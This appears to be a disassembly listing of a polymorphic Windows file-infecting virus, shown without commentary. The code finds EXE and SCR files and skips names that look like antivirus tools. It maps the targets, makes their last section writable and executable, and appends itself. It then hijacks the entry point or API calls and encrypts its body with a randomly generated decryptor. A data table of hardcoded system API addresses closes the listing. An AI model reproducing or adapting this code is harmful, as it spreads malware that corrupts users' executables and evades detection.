jnz short loc_3150ACF5
mov ax, 424h
stosw
jmp short loc_3150AD08
; ---------------------------------------------------------------------------
loc_3150ACF5: ; CODE XREF: UPX2:3150ACEB�j
mov al, 8
stosb
jmp short loc_3150AD08
; ---------------------------------------------------------------------------
loc_3150ACFA: ; CODE XREF: UPX2:3150ACD2�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_3150AD0B
; ---------------------------------------------------------------------------
loc_3150AD08: ; CODE XREF: UPX2:3150ACC6�j
; UPX2:3150ACF3�j ...
mov al, 0C9h
stosb
loc_3150AD0B: ; CODE XREF: UPX2:3150AC7E�j
; UPX2:3150AD06�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150AD37
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_3150AD37: ; CODE XREF: UPX2:3150AD15�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_3150ADA2
test dword ptr [ebp+403431h], 20000000h
jz short loc_3150AD68
loc_3150AD5B: ; CODE XREF: UPX2:3150AD66�j
test edi, 3
jz short loc_3150AD68
mov al, 90h
stosb
jmp short loc_3150AD5B
; ---------------------------------------------------------------------------
loc_3150AD68: ; CODE XREF: UPX2:3150AD59�j
; UPX2:3150AD61�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_3150AD96
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_3150ADA0
; ---------------------------------------------------------------------------
loc_3150AD96: ; CODE XREF: UPX2:3150AD88�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_3150ADA0: ; CODE XREF: UPX2:3150AD94�j
stosw
loc_3150ADA2: ; CODE XREF: UPX2:3150AD4D�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3150AE21
test dword ptr [ebp+403431h], 20000000h
jz short loc_3150ADC7
loc_3150ADBA: ; CODE XREF: UPX2:3150ADC5�j
test edi, 3
jz short loc_3150ADC7
mov al, 90h
stosb
jmp short loc_3150ADBA
; ---------------------------------------------------------------------------
loc_3150ADC7: ; CODE XREF: UPX2:3150ADB8�j
; UPX2:3150ADC0�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_3150ADF0
lea eax, [ebp+403429h]
loc_3150ADE8: ; CODE XREF: UPX2:3150ADEE�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_3150ADE8
loc_3150ADF0: ; CODE XREF: UPX2:3150ADE0�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_3150AE05
mov ax, 0C031h
stosw
loc_3150AE05: ; CODE XREF: UPX2:3150ADFD�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_3150AE1E
mov ax, 0C031h
stosw
loc_3150AE1E: ; CODE XREF: UPX2:3150AE16�j
mov al, 0C3h
stosb
loc_3150AE21: ; CODE XREF: UPX2:3150ADAC�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3150AE39
push edi
sub edi, eax
pop eax
jmp short loc_3150AE52
; ---------------------------------------------------------------------------
loc_3150AE39: ; CODE XREF: UPX2:3150AE31�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_3150AE52: ; CODE XREF: UPX2:3150AE37�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_3150AE72
neg eax
loc_3150AE72: ; CODE XREF: UPX2:3150AE6E�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_3150AE76 proc near ; CODE XREF: sub_3150B2A2+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_3150B05E
call near ptr loc_3150AE96+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3150AE96: ; CODE XREF: sub_3150AE76+F�p
add bh, bh
sub_3150AE76 endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_3150A5B0
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_3150A5B0
mov edi, [ebp+4039A6h]
push esi
call sub_3150A5B0
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_3150B05E
jz loc_3150B05E
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_3150B02F
loc_3150AF10: ; CODE XREF: sub_3150B02F+29�j
lodsb
cmp al, 0E8h
jnz loc_3150AFBB
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_3150A5B0
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_3150AF3E
cmp eax, [edi+0Ch]
jnb loc_3150B057
jmp short loc_3150AF4A
; ---------------------------------------------------------------------------
loc_3150AF3E: ; CODE XREF: sub_3150B02F-FE�j
cmp [ebp+4039A6h], edx
jnz loc_3150B057
loc_3150AF4A: ; CODE XREF: sub_3150B02F-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_3150B057
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_3150A5B0
cmp [ebp+4039A6h], edi
jnz loc_3150B057
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3150B057
cmp eax, [edi+8]
jnb loc_3150B057
loc_3150AF93: ; CODE XREF: sub_3150B02F+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_3150B06D
jmp loc_3150B057
; ---------------------------------------------------------------------------
loc_3150AFBB: ; CODE XREF: sub_3150B02F-11C�j
cmp al, 0FFh
jnz loc_3150B057
cmp byte ptr [esi], 15h
jnz loc_3150B057
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_3150A5B0
cmp [ebp+4039A6h], edi
jnz short loc_3150B057
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_3150B004
cmp eax, [ebp+4039C6h]
jb short loc_3150B06D
loc_3150B004: ; CODE XREF: sub_3150B02F-35�j
cmp eax, 70000000h
jb short loc_3150B042
call sub_3150B02F
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_3150B02E
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_3150B049
; ---------------------------------------------------------------------------
locret_3150B02E: ; CODE XREF: sub_3150B02F-F�j
retn
; END OF FUNCTION CHUNK FOR sub_3150B02F
; =============== S U B R O U T I N E =======================================
sub_3150B02F proc near ; CODE XREF: sub_3150B02F-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 3150AF10 SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_3150A6B7
popa
loc_3150B042: ; CODE XREF: sub_3150B02F-26�j
test eax, 80000000h
jnz short loc_3150B057
loc_3150B049: ; CODE XREF: sub_3150B02F-3�j
sub eax, [edi+0Ch]
jb short loc_3150B057
cmp eax, [edi+8]
jb loc_3150AF93
loc_3150B057: ; CODE XREF: sub_3150B02F-F9�j
; sub_3150B02F-EB�j ...
dec ecx
jnz loc_3150AF10
loc_3150B05E: ; CODE XREF: sub_3150AE76+9�j
; UPX2:3150AEF8�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_3150B0A9
; ---------------------------------------------------------------------------
loc_3150B06D: ; CODE XREF: sub_3150B02F-7F�j
; sub_3150B02F-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_3150B0A9: ; CODE XREF: sub_3150B02F+3C�j
pop edi
pop esi
retn
sub_3150B02F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150B0AC proc near ; CODE XREF: UPX2:3150B27A�p
; sub_3150B2A2+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_3150B17D
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_3150B17D
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_3150B635
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_3150B629
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_3150B629
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_3150B629
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_3150B601
mov [ebp+403972h], eax
locret_3150B17D: ; CODE XREF: sub_3150B0AC+10�j
; sub_3150B0AC+27�j ...
retn
sub_3150B0AC endp
; =============== S U B R O U T I N E =======================================
sub_3150B17E proc near ; CODE XREF: sub_3150B2A2+117�p
; sub_3150B2A2+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3150B198
add eax, [ebp+40106Dh]
loc_3150B198: ; CODE XREF: sub_3150B17E+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_3150B17E endp
; =============== S U B R O U T I N E =======================================
sub_3150B1C3 proc near ; CODE XREF: sub_3150B2A2:loc_3150B2F1�p
; sub_3150B2A2+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_3150B1C8: ; CODE XREF: sub_3150B1C3+23�j
jecxz short locret_3150B1FF
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3150B1FF
cmp dword ptr [edx+0Ch], 1
jb short loc_3150B1C8
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_3150B1FF: ; CODE XREF: sub_3150B1C3:loc_3150B1C8�j
; sub_3150B1C3+1D�j ...
retn
sub_3150B1C3 endp
; =============== S U B R O U T I N E =======================================
sub_3150B200 proc near ; CODE XREF: UPX2:3150B28C�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3150B200 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3150B20D: ; CODE XREF: UPX2:3150B22E�j
mov ecx, edi
jmp short loc_3150B21C
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_3150B218: ; CODE XREF: UPX2:3150B22A�j
mov ebx, edi
xor ecx, ecx
loc_3150B21C: ; CODE XREF: UPX2:3150B20F�j
; UPX2:3150B232�j
lodsb
cmp al, 61h
jb short loc_3150B227
cmp al, 7Ah
ja short loc_3150B227
sub al, 20h
loc_3150B227: ; CODE XREF: UPX2:3150B21F�j
; UPX2:3150B223�j
stosb
cmp al, 5Ch
jz short loc_3150B218
cmp al, 2Eh
jz short loc_3150B20D
cmp al, 0
jnz short loc_3150B21C
jecxz short locret_3150B1FF
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3150B24A
cmp eax, 524353h
jnz locret_3150B17D
loc_3150B24A: ; CODE XREF: UPX2:3150B23D�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3150B17D
cmp eax, 4E554357h
jz locret_3150B17D
cmp eax, 32334357h
jz locret_3150B17D
cmp eax, 4F545350h
jz locret_3150B17D
xor ebx, ebx
call sub_3150B0AC
jz locret_3150B17D
xor edx, edx
call sub_3150B2A2
call sub_3150B200
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_3150B5DF
; =============== S U B R O U T I N E =======================================
sub_3150B2A2 proc near ; CODE XREF: UPX2:3150B287�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3150B5DF
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3150B5DF
test dword ptr [ebx+16h], 2000h
jnz loc_3150B5DF
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_3150B5DF
jecxz short loc_3150B2F1
cmp ecx, 101h
jbe loc_3150B5DF
loc_3150B2F1: ; CODE XREF: sub_3150B2A2+41�j
call sub_3150B1C3
jb loc_3150B5DF
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_31509DFB
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_3150B31B: ; CODE XREF: sub_3150B2A2+92�j
push 20h
dec cl
pop eax
js short loc_3150B336
call sub_31509DFB
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_3150B31B
; ---------------------------------------------------------------------------
loc_3150B336: ; CODE XREF: sub_3150B2A2+7E�j
; sub_3150B2A2+CD�j ...
push 6
pop ecx
loc_3150B33C: ; CODE XREF: sub_3150B2A2+B8�j
push 6
pop eax
call sub_31509DFB
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_3150B33C
test dword ptr [ebp+403431h], 8
jnz short loc_3150B371
cmp byte ptr [ebp+40342Bh], 1
jz short loc_3150B336
loc_3150B371: ; CODE XREF: sub_3150B2A2+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3150B398
cmp byte ptr [ebp+403429h], 5
jz short loc_3150B336
cmp byte ptr [ebp+40342Ah], 5
jz short loc_3150B336
cmp byte ptr [ebp+40342Bh], 5
jz short loc_3150B336
loc_3150B398: ; CODE XREF: sub_3150B2A2+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150B3AD
cmp byte ptr [ebp+403429h], 2
ja short loc_3150B336
loc_3150B3AD: ; CODE XREF: sub_3150B2A2+100�j
and dword ptr [ebp+4039AEh], 0
call loc_3150A848
call sub_3150B17E
call sub_3150B5E8
mov ebx, [ebp+403976h]
call sub_3150B0AC
jz loc_3150B5DF
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3150B1C3
jb loc_3150B5DF
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3150B415
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_3150B415: ; CODE XREF: sub_3150B2A2+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_3150B429
rep movsb
loc_3150B429: ; CODE XREF: sub_3150B2A2+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_3150B4E1
push dword ptr [ebx+28h]
call sub_3150A5B0
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_3150B4E1
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3150B466
xor ecx, ecx
loc_3150B466: ; CODE XREF: sub_3150B2A2+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_3150B4CD
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_3150B4A6
neg dword ptr [eax]
loc_3150B4A6: ; CODE XREF: sub_3150B2A2+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_3150B4C4
neg dword ptr [eax]
loc_3150B4C4: ; CODE XREF: sub_3150B2A2+21E�j
push ecx
call sub_3150B17E
pop ecx
jmp short loc_3150B4D9
; ---------------------------------------------------------------------------
loc_3150B4CD: ; CODE XREF: sub_3150B2A2+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3150B4D9: ; CODE XREF: sub_3150B2A2+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_3150B4E1: ; CODE XREF: sub_3150B2A2+191�j
; sub_3150B2A2+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_3150B4FA
imul edx, 12345678h
loc_3150B4FA: ; CODE XREF: sub_3150B2A2+250�j
mov [eax-1], dl
call sub_315094CE
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_3150B52B
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_3150B52B: ; CODE XREF: sub_3150B2A2+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150B550
push edx
call sub_3150AE76
pop edx
loc_3150B550: ; CODE XREF: sub_3150B2A2+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_3150B55B
mov [ebx+28h], ecx
loc_3150B55B: ; CODE XREF: sub_3150B2A2+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_3150B56C
mov [edx+8], ecx
loc_3150B56C: ; CODE XREF: sub_3150B2A2+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_3150B59D
add ecx, [ebp+40106Dh]
loc_3150B59D: ; CODE XREF: sub_3150B2A2+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_3150B5BF
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_3150B5BF
mov dh, [ebp+403430h]
loc_3150B5BF: ; CODE XREF: sub_3150B2A2+307�j
; sub_3150B2A2+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_3150B5D6
loc_3150B5CB: ; CODE XREF: sub_3150B2A2+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3150B5CB
jmp short loc_3150B5DF
; ---------------------------------------------------------------------------
loc_3150B5D6: ; CODE XREF: sub_3150B2A2+327�j
; sub_3150B2A2+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3150B5D6
loc_3150B5DF: ; CODE XREF: UPX2:3150B29D�j
; sub_3150B2A2+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3150B2A2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150B5E8 proc near ; CODE XREF: sub_3150B2A2+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_3150B17D
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_3150B601: ; CODE XREF: sub_3150B0AC+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_3150B629: ; CODE XREF: sub_3150B0AC+6B�j
; sub_3150B0AC+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_3150B635: ; CODE XREF: sub_3150B0AC+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_3150B5E8 endp
; ---------------------------------------------------------------------------
dd 0E8h, 16A5D00h, 3349ED81h, 0F0580040h, 8085C10Fh, 85004015h
dd 0C883C3C0h, 0C10FF0FFh, 40158085h, 103DC300h, 75002A00h
dd 7C81661Ch, 716C0C24h, 0E8601375h, 0FFFFFFC4h, 7EE80575h
dd 0E8FFFFFBh, 0FFFFFFD2h, 2DFF2E61h, 12345678h, 25B8h
dd 0A5E86000h, 75FFFFFFh, 24448B39h, 4EB58D30h, 8B004038h
dd 81660850h, 7302063Ah, 685625h, 8B00FF00h, 52006AC4h
dd 0F895FF50h, 83004035h, 3E8108C4h, 5C3F3F5Ch, 0C6830375h
dd 0FB2BE804h, 7FE8FFFFh, 61FFFFFFh, 74B8C3h, 0B1EB0000h
dd 2FB8h, 10E800h, 20C20000h, 30B800h, 3E80000h, 0C2000000h
dd 548D0024h, 2ECD0C24h, 7C00F883h, 0E86019h, 8B000000h
dd 5D302454h, 0ED811A8Bh, 403413h, 0FFE539E8h, 4C261FFh
dd 6010200h, 88050703h, 0F48EE1D9h, 415FF24h, 90004020h
dd 40h dup(0)
dd 7C809B47h, 7C8308ADh, 7C910331h, 7C80ADA0h, 3 dup(0)
dd 7C80BDB6h, 7C801A24h, 7C80945Ch, 7C802367h, 7C81042Ch
dd 7C810637h, 7C864B0Fh, 7C80C058h, 7C80E7ECh, 7C81153Ch
dd 7C810A77h, 7C831C45h, 7C80B6A1h, 7C8608FFh, 7C835DCAh
dd 7C8111DAh, 7C812ADEh, 7C801D77h, 7C80B905h, 7C80BB76h
dd 7C8309E1h, 7C863DE5h, 7C863F58h, 7C812782h, 7C831CB8h
dd 7C802442h, 7C810B1Ch, 7C80B974h, 7C809A51h, 7C810D87h
dd 7C90D460h, 7C90D682h, 7C90D754h, 7C90D769h, 7C90D793h
dd 7C90DC55h, 7C90DCFDh, 7C90DD90h, 7C90DEB6h, 7C90EA32h
dd 7C9130C6h, 15h dup(0)
dd 380036h, 3150B964h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
dd 790000h, 0Ch dup(0)
dd 50000000h, 7FFDh, 18CFh dup(0)
UPX2 ends
; Section 4. (virtual address 00012000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00012000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31512000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start